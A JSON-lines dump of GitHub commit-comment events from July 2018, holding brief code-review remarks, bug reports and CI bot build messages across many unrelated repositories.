{"id":"7905622239","type":"CommitCommentEvent","actor":{"login":"tbalden"},"repo":{"name":"sultanxda/android_kernel_google_wahoo"},"payload":{"comment":{"id":29563837,"position":null,"line":null,"path":null,"commit_id":"0a737ab6ec5267e8e4414cb7c58cb17e7b9ecebc","created_at":"2018-07-02T09:49:57Z","updated_at":"2018-07-02T09:49:57Z","author_association":"NONE","body":"Since then I've checked and reverted this one, as the compatibilty only required  modversions intact, and that could be satisfied without this patch in my case.\r\nThanks for the clarification there"}},"created_at":"2018-07-02T09:49:57Z"}
{"id":"7905622894","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29563838,"position":5,"line":45,"path":"contracts/Splitter.sol","commit_id":"18138fd8da61fe6e4d651bc78337df5feedca2e7","created_at":"2018-07-02T09:50:05Z","updated_at":"2018-07-02T09:50:05Z","author_association":"NONE","body":"Typically we call it `withdraw`. I think `receive` is ambiguous as to which direction funds go."}},"created_at":"2018-07-02T09:50:05Z"}
{"id":"7905624304","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29563840,"position":5,"line":45,"path":"contracts/Splitter.sol","commit_id":"18138fd8da61fe6e4d651bc78337df5feedca2e7","created_at":"2018-07-02T09:50:20Z","updated_at":"2018-07-02T09:50:20Z","author_association":"NONE","body":"And `send` is typically called `deposit`."}},"created_at":"2018-07-02T09:50:20Z"}
{"id":"7905624977","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563841,"position":39,"line":39,"path":"week -2(Orientation)/day3/GreetSomeOne/GreetSomeOne/Controllers/GreetController.cs","commit_id":"ee88c1678969e62a2e73c88f4af63b78d315f22f","created_at":"2018-07-02T09:50:28Z","updated_at":"2018-07-02T09:50:28Z","author_association":"NONE","body":"If the Views name is also `Greet` you just pass the model(object), the method name will tell the ASP.NET which one `View` is targeted."}},"created_at":"2018-07-02T09:50:28Z"}
{"id":"7905625166","type":"CommitCommentEvent","actor":{"login":"hdouangm-test"},"repo":{"name":"testClassroomForLol/testassignment-espagne"},"payload":{"comment":{"id":29563842,"position":null,"line":null,"path":null,"commit_id":"d5f67cb267ea5ac94bfb94c95ef0a00f981af9c3","created_at":"2018-07-02T09:50:29Z","updated_at":"2018-07-02T09:50:29Z","author_association":"NONE","body":"test3"}},"created_at":"2018-07-02T09:50:29Z"}
{"id":"7905628582","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563845,"position":null,"line":null,"path":null,"commit_id":"1de4456e1b4881432b8987d233066d256a80a6ec","created_at":"2018-07-02T09:51:08Z","updated_at":"2018-07-02T09:51:08Z","author_association":"NONE","body":"never forget the gitignore for the nodemodules"}},"created_at":"2018-07-02T09:51:08Z"}
{"id":"7905632175","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563848,"position":15,"line":15,"path":"week-07/Day-01/Frontend/server.js","commit_id":"1de4456e1b4881432b8987d233066d256a80a6ec","created_at":"2018-07-02T09:51:49Z","updated_at":"2018-07-02T09:51:49Z","author_association":"NONE","body":"use `__dirname` instead of root informations"}},"created_at":"2018-07-02T09:51:49Z"}
{"id":"7905632807","type":"CommitCommentEvent","actor":{"login":"davidfokkema"},"repo":{"name":"HiSPARC/publicdb"},"payload":{"comment":{"id":29563850,"position":null,"line":null,"path":null,"commit_id":"09efa4fa8a2af2202ee6a137ded04513b8896876","created_at":"2018-07-02T09:51:56Z","updated_at":"2018-07-02T09:51:56Z","author_association":"MEMBER","body":"Please commit PEP8 changes separately. I had trouble finding the actual change which was described in the commit message, ;-)."}},"created_at":"2018-07-02T09:51:56Z"}
{"id":"7905633472","type":"CommitCommentEvent","actor":{"login":"kwanlei"},"repo":{"name":"kwanlei/yaphets"},"payload":{"comment":{"id":29563852,"position":null,"line":null,"path":null,"commit_id":"e42dfc796c45bdefdfe9dafeafcb7780af85312c","created_at":"2018-07-02T09:52:04Z","updated_at":"2018-07-02T09:52:04Z","author_association":"OWNER","body":"html"}},"created_at":"2018-07-02T09:52:04Z"}
{"id":"7905634321","type":"CommitCommentEvent","actor":{"login":"DooblyNoobly"},"repo":{"name":"unitystation/unitystation"},"payload":{"comment":{"id":29563854,"position":6,"line":52,"path":"UnityProject/Assets/Scripts/PlayGroups/PlayerManager.cs","commit_id":"6f780ffc4ad3a740fc98a59260f5e36f96a075ff","created_at":"2018-07-02T09:52:13Z","updated_at":"2018-07-02T09:52:13Z","author_association":"MEMBER","body":"Nah it works. PlayerList is not apart of Managers on any DoNotDestroy trees. Instead it sits on the scenes themselves so when the scene restarts PlayerList is destroyed. Meaning the Awake method is always called on a new scene and the Instance is null. I tested with debug logs to make sure it fired every round"}},"created_at":"2018-07-02T09:52:13Z"}
{"id":"7905637491","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563869,"position":72,"line":72,"path":"week-07/Day-01/Frontend/server.js","commit_id":"1de4456e1b4881432b8987d233066d256a80a6ec","created_at":"2018-07-02T09:52:50Z","updated_at":"2018-07-02T09:52:50Z","author_association":"NONE","body":"if should be better if you write separate functions for the sum and the factorio"}},"created_at":"2018-07-02T09:52:50Z"}
{"id":"7905637915","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563872,"position":1,"line":23,"path":"log/src/main/java/com/axway/ats/log/AtsDbLogger.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:52:56Z","updated_at":"2018-07-02T09:52:56Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:52:56Z"}
{"id":"7905638710","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563877,"position":114,"line":114,"path":"week-07/Day-01/Frontend/server.js","commit_id":"1de4456e1b4881432b8987d233066d256a80a6ec","created_at":"2018-07-02T09:53:05Z","updated_at":"2018-07-02T09:53:05Z","author_association":"NONE","body":"hékás :D "}},"created_at":"2018-07-02T09:53:05Z"}
{"id":"7905638803","type":"CommitCommentEvent","actor":{"login":"manuasir"},"repo":{"name":"wazuh/wazuh-documentation"},"payload":{"comment":{"id":29563878,"position":null,"line":null,"path":null,"commit_id":"d73b3c946838bafe2179ecc6dd4ab2d766deb4a0","created_at":"2018-07-02T09:53:06Z","updated_at":"2018-07-02T09:53:06Z","author_association":"MEMBER","body":"It looks great to me, thanks!"}},"created_at":"2018-07-02T09:53:06Z"}
{"id":"7905638866","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563879,"position":1,"line":16,"path":"log/src/main/java/com/axway/ats/log/appenders/AbstractDbAppender.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:53:07Z","updated_at":"2018-07-02T09:53:07Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:53:07Z"}
{"id":"7905639459","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563881,"position":1,"line":19,"path":"log/src/main/java/com/axway/ats/log/appenders/ActiveDbAppender.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:53:13Z","updated_at":"2018-07-02T09:53:13Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:53:13Z"}
{"id":"7905640237","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563882,"position":1,"line":23,"path":"log/src/main/java/com/axway/ats/log/appenders/PassiveDbAppender.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:53:20Z","updated_at":"2018-07-02T09:53:20Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:53:20Z"}
{"id":"7905641819","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563884,"position":1,"line":1,"path":"week-07/Day-02/multiple-timeout.js","commit_id":"c2688d44eb5aef1df0d270cf4708ceaf01f0c194","created_at":"2018-07-02T09:53:39Z","updated_at":"2018-07-02T09:53:39Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:53:39Z"}
{"id":"7905642318","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563886,"position":1,"line":1,"path":"week-07/Day-02/prime-squares.js","commit_id":"80092347b5073bb1b544c135004dda8391d63f6f","created_at":"2018-07-02T09:53:45Z","updated_at":"2018-07-02T09:53:45Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:53:45Z"}
{"id":"7905643168","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563887,"position":10,"line":10,"path":"week -2(Orientation)/day3/GreetSomeOne/GreetSomeOne/Services/GreetingService.cs","commit_id":"ee88c1678969e62a2e73c88f4af63b78d315f22f","created_at":"2018-07-02T09:53:55Z","updated_at":"2018-07-02T09:53:55Z","author_association":"NONE","body":"Whenever you want to create something (especially a Model) it is easier to create properties only. \r\nImagine if you have a Model with 20 fields; creating a getter and a setter for each and every one of them you class will we way too much to see trough."}},"created_at":"2018-07-02T09:53:55Z"}
{"id":"7905643695","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563889,"position":1,"line":1,"path":"week-07/Day-02/Giphy/giphy.js","commit_id":"8580588670b88000267fcc8bbab299c9f4c0585c","created_at":"2018-07-02T09:54:01Z","updated_at":"2018-07-02T09:54:01Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:54:01Z"}
{"id":"7905646043","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563897,"position":null,"line":null,"path":null,"commit_id":"3a7f09fdab7090871fdafcf07c1cc558a0bb01ae","created_at":"2018-07-02T09:54:28Z","updated_at":"2018-07-02T09:54:28Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-02T09:54:28Z"}
{"id":"7905646291","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563899,"position":1,"line":15,"path":"log/src/main/java/com/axway/ats/log/autodb/DbAppenderConfiguration.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:54:30Z","updated_at":"2018-07-02T09:54:30Z","author_association":"OWNER","body":"check both files"}},"created_at":"2018-07-02T09:54:30Z"}
{"id":"7905647802","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563902,"position":3,"line":3,"path":"week-07/Day-04-05-Reddit/Public/frontend.js","commit_id":"4dcb8644a2d99e8610c44d6cc1f6b6976cf19e66","created_at":"2018-07-02T09:54:46Z","updated_at":"2018-07-02T09:54:46Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:54:46Z"}
{"id":"7905648119","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563905,"position":1,"line":1,"path":"week-07/Day-04-05-Reddit/Public/frontend.js","commit_id":"4dcb8644a2d99e8610c44d6cc1f6b6976cf19e66","created_at":"2018-07-02T09:54:50Z","updated_at":"2018-07-02T09:54:50Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T09:54:50Z"}
{"id":"7905648373","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563907,"position":1,"line":41,"path":"log/src/main/java/com/axway/ats/log/autodb/DbEventRequestProcessor.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:54:52Z","updated_at":"2018-07-02T09:54:52Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:54:52Z"}
{"id":"7905650021","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563910,"position":1,"line":21,"path":"log/src/main/java/com/axway/ats/log/autodb/QueueLoggerThread.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:55:13Z","updated_at":"2018-07-02T09:55:13Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:55:13Z"}
{"id":"7905652016","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563914,"position":1,"line":35,"path":"log/src/test/java/com/axway/ats/log/model/Test_AutoLogger.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:55:35Z","updated_at":"2018-07-02T09:55:35Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:55:35Z"}
{"id":"7905653775","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563921,"position":4,"line":4,"path":"week-07/Day-04-05-Reddit/Public/frontend.js","commit_id":"4dcb8644a2d99e8610c44d6cc1f6b6976cf19e66","created_at":"2018-07-02T09:55:54Z","updated_at":"2018-07-02T09:55:54Z","author_association":"NONE","body":"please never use syncronous requests"}},"created_at":"2018-07-02T09:55:54Z"}
{"id":"7905653889","type":"CommitCommentEvent","actor":{"login":"dslaveykov"},"repo":{"name":"dslaveykov/ats-framework"},"payload":{"comment":{"id":29563922,"position":1,"line":28,"path":"testharness/src/main/java/com/axway/ats/harness/testng/AtsTestngListener.java","commit_id":"b5b982be425ed2f77bbc902db8a7a2a32cfb5634","created_at":"2018-07-02T09:55:56Z","updated_at":"2018-07-02T09:55:56Z","author_association":"OWNER","body":"check this file"}},"created_at":"2018-07-02T09:55:56Z"}
{"id":"7905654734","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563923,"position":6,"line":6,"path":"week-07/Day-04-05-Reddit/Public/frontend.js","commit_id":"4dcb8644a2d99e8610c44d6cc1f6b6976cf19e66","created_at":"2018-07-02T09:56:06Z","updated_at":"2018-07-02T09:56:06Z","author_association":"NONE","body":"nice arrow function"}},"created_at":"2018-07-02T09:56:06Z"}
{"id":"7905660756","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563932,"position":null,"line":null,"path":null,"commit_id":"4dcb8644a2d99e8610c44d6cc1f6b6976cf19e66","created_at":"2018-07-02T09:57:12Z","updated_at":"2018-07-02T09:57:12Z","author_association":"NONE","body":"please don't push more than one thing in one commit message"}},"created_at":"2018-07-02T09:57:12Z"}
{"id":"7905663807","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/MartonSkach"},"payload":{"comment":{"id":29563933,"position":59,"line":63,"path":"week-07/Day-04-05-Reddit/Public/frontend.js","commit_id":"d548bdd4072ff6fb8f2a10e05d37e7317e049806","created_at":"2018-07-02T09:57:47Z","updated_at":"2018-07-02T09:57:47Z","author_association":"NONE","body":"i saw you write nice arrow functions, then use them!! :D "}},"created_at":"2018-07-02T09:57:47Z"}
{"id":"7905663891","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/MrBB7"},"payload":{"comment":{"id":29563934,"position":17,"line":17,"path":"week -2(Orientation)/day2/BankOfSimba/BankOfSimba/Controllers/AnimalAccController.cs","commit_id":"2b2afad33e800b89c69c3666309bdaff3ca8b1b0","created_at":"2018-07-02T09:57:48Z","updated_at":"2018-07-02T09:57:48Z","author_association":"NONE","body":"Maybe you should use a bit more descriptive method name, this method should give us the information via the name of it what it does. :) But is it not a bad name, but it can be a bit better that way."}},"created_at":"2018-07-02T09:57:48Z"}
{"id":"7905665708","type":"CommitCommentEvent","actor":{"login":"naltatis"},"repo":{"name":"neuland/micro-frontends"},"payload":{"comment":{"id":29563938,"position":null,"line":null,"path":null,"commit_id":"0bd40ffb1b5f4ca5871ce9d0c993bc7c48bba653","created_at":"2018-07-02T09:58:08Z","updated_at":"2018-07-02T09:58:08Z","author_association":"MEMBER","body":"Thanks!"}},"created_at":"2018-07-02T09:58:08Z"}
{"id":"7905666248","type":"CommitCommentEvent","actor":{"login":"Soumil07"},"repo":{"name":"TheLearneer/croyale"},"payload":{"comment":{"id":29563941,"position":22,"line":14,"path":"lib/util/Util.js","commit_id":"4da09ed351118283176d0b0c2462c0d8b1a6020a","created_at":"2018-07-02T09:58:14Z","updated_at":"2018-07-02T09:58:14Z","author_association":"NONE","body":"/[#][0289PYLQGRJCUV]{4,9}/\r\n\r\nWorks for both CoC and CR tags."}},"created_at":"2018-07-02T09:58:14Z"}
{"id":"7905667119","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29563942,"position":null,"line":null,"path":null,"commit_id":"874587f72f2b9bd7b03ec290cd6743d543b39280","created_at":"2018-07-02T09:58:24Z","updated_at":"2018-07-02T09:58:24Z","author_association":"COLLABORATOR","body":"Puzzle `952-47c309d2` discovered in   [`src/test/java/com/zerocracy/pmo/PeopleTest.java`](  https://github.com/zerocracy/farm/blob/master/src/test/java/com/zerocracy/pmo/PeopleTest.java)   and submitted as #1305. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-02T09:58:24Z"}
{"id":"7909516097","type":"CommitCommentEvent","actor":{"login":"qwertychouskie"},"repo":{"name":"supertuxkart/dependencies"},"payload":{"comment":{"id":29573639,"position":445,"line":439,"path":"windows/openal.license","commit_id":"8c4657b8e089389880d148c7dfd86cfaae28897b","created_at":"2018-07-03T00:00:16Z","updated_at":"2018-07-03T00:00:16Z","author_association":"NONE","body":"this should be removed"}},"created_at":"2018-07-03T00:00:16Z"}
{"id":"7909519064","type":"CommitCommentEvent","actor":{"login":"Zomebody"},"repo":{"name":"Zomebody/OW_Team_Balancer"},"payload":{"comment":{"id":29573651,"position":null,"line":null,"path":null,"commit_id":"7e1eba304bc7c771107e646a8f8275132e87ccff","created_at":"2018-07-03T00:01:15Z","updated_at":"2018-07-03T00:01:15Z","author_association":"OWNER","body":"clarification: Quick Add now supports lower case for roles (e.g. tank or dps)"}},"created_at":"2018-07-03T00:01:15Z"}
{"id":"7909523112","type":"CommitCommentEvent","actor":{"login":"KanikaBhambi"},"repo":{"name":"KanikaBhambi/KanikaBhambi.github.io"},"payload":{"comment":{"id":29573656,"position":null,"line":null,"path":null,"commit_id":"1c770cd99d060dcdd57bfce4ce03ec6640bdcd8f","created_at":"2018-07-03T00:02:48Z","updated_at":"2018-07-03T00:02:48Z","author_association":"OWNER","body":"My personal page"}},"created_at":"2018-07-03T00:02:48Z"}
{"id":"7909524006","type":"CommitCommentEvent","actor":{"login":"jaydeep1984"},"repo":{"name":"cooldoger/cassandra"},"payload":{"comment":{"id":29573657,"position":6,"line":58,"path":"src/java/org/apache/cassandra/dht/tokenallocator/TokenAllocation.java","commit_id":"5195288f12cecb9faccea9d35328144a66d77f59","created_at":"2018-07-03T00:03:10Z","updated_at":"2018-07-03T00:03:10Z","author_association":"NONE","body":"nit:\r\nMaybe we should add the dc name for which we have 0 replicas in the exception message."}},"created_at":"2018-07-03T00:03:10Z"}
{"id":"7909525682","type":"CommitCommentEvent","actor":{"login":"lawando"},"repo":{"name":"lawando/OpenRAUserAccounts"},"payload":{"comment":{"id":29573665,"position":null,"line":null,"path":null,"commit_id":"67750a49e124693533746fa75c525a9557abfe64","created_at":"2018-07-03T00:03:54Z","updated_at":"2018-07-03T00:03:54Z","author_association":"OWNER","body":"Most of these changes will be reverted as it turned out that  it is better to use the order of badges (like in acp_icons.php / acp_icons.html) instead of a selection to control which badges should be shown in the game (5 max.)."}},"created_at":"2018-07-03T00:03:54Z"}
{"id":"7909529990","type":"CommitCommentEvent","actor":{"login":"mikejr83"},"repo":{"name":"diefarbe/node-lib"},"payload":{"comment":{"id":29573674,"position":5,"line":13,"path":"src/models/color.ts","commit_id":"15bd313a5592535ee4ea10db62cada54e0598104","created_at":"2018-07-03T00:05:37Z","updated_at":"2018-07-03T00:05:37Z","author_association":"CONTRIBUTOR","body":"Whoops!"}},"created_at":"2018-07-03T00:05:37Z"}
{"id":"7909532667","type":"CommitCommentEvent","actor":{"login":"YukiSakamotoCD"},"repo":{"name":"YukiSakamotoCD/Yuki"},"payload":{"comment":{"id":29573681,"position":null,"line":null,"path":null,"commit_id":"767bb2e7c4aee4df55c791d4f7c0635c70db24b2","created_at":"2018-07-03T00:06:42Z","updated_at":"2018-07-03T00:06:42Z","author_association":"OWNER","body":"mkdir awesome\r\ncd awesome \r\ngit init\r\n"}},"created_at":"2018-07-03T00:06:42Z"}
{"id":"7909533183","type":"CommitCommentEvent","actor":{"login":"mikejr83"},"repo":{"name":"diefarbe/node-lib"},"payload":{"comment":{"id":29573683,"position":null,"line":null,"path":null,"commit_id":"15bd313a5592535ee4ea10db62cada54e0598104","created_at":"2018-07-03T00:06:55Z","updated_at":"2018-07-03T00:06:55Z","author_association":"CONTRIBUTOR","body":"What setting are you using that's causing the spacing to be detected as changes? I setup an .editorconfig file so that hopefully we'd all be on spaces."}},"created_at":"2018-07-03T00:06:55Z"}
{"id":"7909534538","type":"CommitCommentEvent","actor":{"login":"akrips"},"repo":{"name":"akrips/ZUT"},"payload":{"comment":{"id":29573687,"position":null,"line":null,"path":null,"commit_id":"5fc2de0cb8daecda6dac281961492bea01c24206","created_at":"2018-07-03T00:07:26Z","updated_at":"2018-07-03T00:07:26Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-03T00:07:26Z"}
{"id":"7909536731","type":"CommitCommentEvent","actor":{"login":"drgrib"},"repo":{"name":"deanishe/awgo"},"payload":{"comment":{"id":29573693,"position":39,"line":58,"path":"README.md","commit_id":"5f0051950af39371385f2dfda96483eb1423e565","created_at":"2018-07-03T00:08:21Z","updated_at":"2018-07-03T00:08:21Z","author_association":"NONE","body":"@deanishe The setting of 3 environment variables was probably mentioned somewhere in your explanations but this is the first time I'm hearing that I can get by with _just_ setting them. And you're right, that isn't a bad. I still think that long term, you'll want to give developers a way to select shell vs Alfred programmatically. And I'll brainstorm the best way to do this as I work with your package and make the easiest suggestion I can and/or PRs if I can figure out the code changes myself.\r\n\r\nFor the record, I think that your package is the best approach to Alfred workflow development not only in Go but in general. That's why I take the time to invest in it and help as best I can to development. These accommodations are not meant just for me personally but also to enhance the adoptability of the project by new developers. Which I would very much like to see to ensure the longevity of a package that I myself am investing in.\r\n"}},"created_at":"2018-07-03T00:08:21Z"}
{"id":"7909537871","type":"CommitCommentEvent","actor":{"login":"hxqqqqqq"},"repo":{"name":"TheMagician1/redmine_backlogs"},"payload":{"comment":{"id":29573694,"position":null,"line":null,"path":null,"commit_id":"75b8c77a95e671e0efbb6deb89fc500167057652","created_at":"2018-07-03T00:08:45Z","updated_at":"2018-07-03T00:08:45Z","author_association":"NONE","body":"when i drag the story to sprints,the backlogs show me this error info:\r\nMysql2::Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'where id = 1' at line 1: update issues set position = where id = 1\r\nwhy? do the plugin does't support the high version MariaDB？ how i can do that?"}},"created_at":"2018-07-03T00:08:45Z"}
{"id":"7909540828","type":"CommitCommentEvent","actor":{"login":"ssadq"},"repo":{"name":"ssadq/-"},"payload":{"comment":{"id":29573705,"position":null,"line":null,"path":null,"commit_id":"d48cffb20ec0f7b6f15d418910fcc685dc99275a","created_at":"2018-07-03T00:09:50Z","updated_at":"2018-07-03T00:09:50Z","author_association":"OWNER","body":"![screenshot_ - - - - -](https://user-images.githubusercontent.com/40778273/42191964-750c782a-7e6e-11e8-8b1d-f1e585da8aa5.png)\r\n"}},"created_at":"2018-07-03T00:09:50Z"}
{"id":"7909545537","type":"CommitCommentEvent","actor":{"login":"NautilusXV"},"repo":{"name":"NautilusXV/AoNoKisekiPC"},"payload":{"comment":{"id":29573719,"position":null,"line":null,"path":null,"commit_id":"7bb07aa441f34a6281271e61e701a507c113568e","created_at":"2018-07-03T00:11:45Z","updated_at":"2018-07-03T00:11:45Z","author_association":"OWNER","body":"add maybe later down road"}},"created_at":"2018-07-03T00:11:45Z"}
{"id":"7909550201","type":"CommitCommentEvent","actor":{"login":"joshualiuxu"},"repo":{"name":"jtclaypool/microbiome"},"payload":{"comment":{"id":29573732,"position":null,"line":null,"path":null,"commit_id":"7b2cf36a61db25a313a1fbf77554a5c82ec61f59","created_at":"2018-07-03T00:13:40Z","updated_at":"2018-07-03T00:13:40Z","author_association":"NONE","body":"importing  example has some troubles if run as your code but the whole streamline is  nice and convient ^.^"}},"created_at":"2018-07-03T00:13:40Z"}
{"id":"7909557333","type":"CommitCommentEvent","actor":{"login":"Shumaister"},"repo":{"name":"Shumaister/FrbaHotel"},"payload":{"comment":{"id":29573751,"position":null,"line":null,"path":null,"commit_id":"49660dc13f0ee9b3e00acedcbf401f247ce541f2","created_at":"2018-07-03T00:16:37Z","updated_at":"2018-07-03T00:16:37Z","author_association":"OWNER","body":"Ojo que si son menores, no es legal"}},"created_at":"2018-07-03T00:16:37Z"}
{"id":"7909557703","type":"CommitCommentEvent","actor":{"login":"jananiravi"},"repo":{"name":"SDundon/SDundon.github.io"},"payload":{"comment":{"id":29573753,"position":null,"line":null,"path":null,"commit_id":"c5e37919764fa50bf0e176824130b3b3d482a515","created_at":"2018-07-03T00:16:45Z","updated_at":"2018-07-03T00:16:45Z","author_association":"NONE","body":"@SDundon move just the content of this folder to your github.io folder for ease of hosting."}},"created_at":"2018-07-03T00:16:45Z"}
{"id":"7909559890","type":"CommitCommentEvent","actor":{"login":"Sweta7"},"repo":{"name":"Sweta7/Dunedin_Railways_Systems"},"payload":{"comment":{"id":29573759,"position":null,"line":null,"path":null,"commit_id":"cfd2fd17df759949c78c836910e6e7ba73f976f4","created_at":"2018-07-03T00:17:42Z","updated_at":"2018-07-03T00:17:42Z","author_association":"OWNER","body":"Basic algorithm to select the volunteers from interested and may be interested field."}},"created_at":"2018-07-03T00:17:42Z"}
{"id":"7909563801","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29573769,"position":null,"line":null,"path":null,"commit_id":"51751ea2249a576fecd37098884d13c0aefa9af9","created_at":"2018-07-03T00:19:18Z","updated_at":"2018-07-03T00:19:18Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2970 of 2970 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-03T00:19:18Z"}
{"id":"7909566079","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29573773,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-03T00:20:15Z","updated_at":"2018-07-03T00:20:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T00:20:15Z"}
